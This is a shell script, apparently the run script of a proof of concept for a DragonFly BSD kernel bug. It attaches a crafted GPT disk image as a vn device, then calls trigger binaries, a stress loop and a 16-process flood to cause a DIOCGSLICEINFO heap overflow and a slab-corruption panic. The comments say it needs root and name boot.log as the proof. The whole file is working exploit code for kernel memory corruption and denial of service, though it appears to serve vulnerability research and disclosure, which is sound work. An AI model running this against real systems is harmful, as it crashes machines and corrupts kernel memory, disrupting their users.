#!/bin/sh
# DF-0074 run script -- triggers the DIOCGSLICEINFO heap overflow and induces
# the slab-corruption panic. MUST RUN AS ROOT (devfs grants /dev/vn0* as
# root:operator crw-r----- on the default ruleset; an unprivileged user gets
# EACCES -- see VERDICT.md "Reachability"). The panic is asynchronous
# (slab_cleanup trips after the trigger process exits), so this script may
# return before the guest freezes; the proof is in dfbsd-qemu/boot.log.
#
# Usage (as root on the guest):  ./run.sh [vn_device]
DEV=${1:-vn0}
cd "$(dirname "$0")"
echo "=== attaching crafted GPT image (128 entries) to $DEV ==="
vnconfig -c "$DEV" ./overflow.img
echo "attach rc=$?"
ls /dev/${DEV}* 2>&1 | head -20
echo
echo "=== single DIOCGSLICEINFO (proves overflow: nslices should be 130) ==="
./trigger /dev/${DEV}s1
echo "trigger rc=$?"
echo
echo "=== stress: 5 ioctl+fd-churn iters + fork/exit churn (induces panic) ==="
./trigger_stress /dev/${DEV}s1 5
echo "stress rc=$?"
echo
echo "=== parallel flood (16 procs) to churn slab zones hit by the overrun ==="
i=0
while [ $i -lt 16 ]; do
    ./trigger /dev/${DEV}s1 >/dev/null 2>&1 &
    i=$((i+1))
done
wait
echo "flood rc=$?"
echo
echo "=== if the guest is still up, the async slab_cleanup panic will follow; ==="
echo "=== check dfbsd-qemu/boot.log for: 'Fatal trap 12 ... slab_cleanup'      ==="
vnconfig -u "$DEV" 2>/dev/null || true
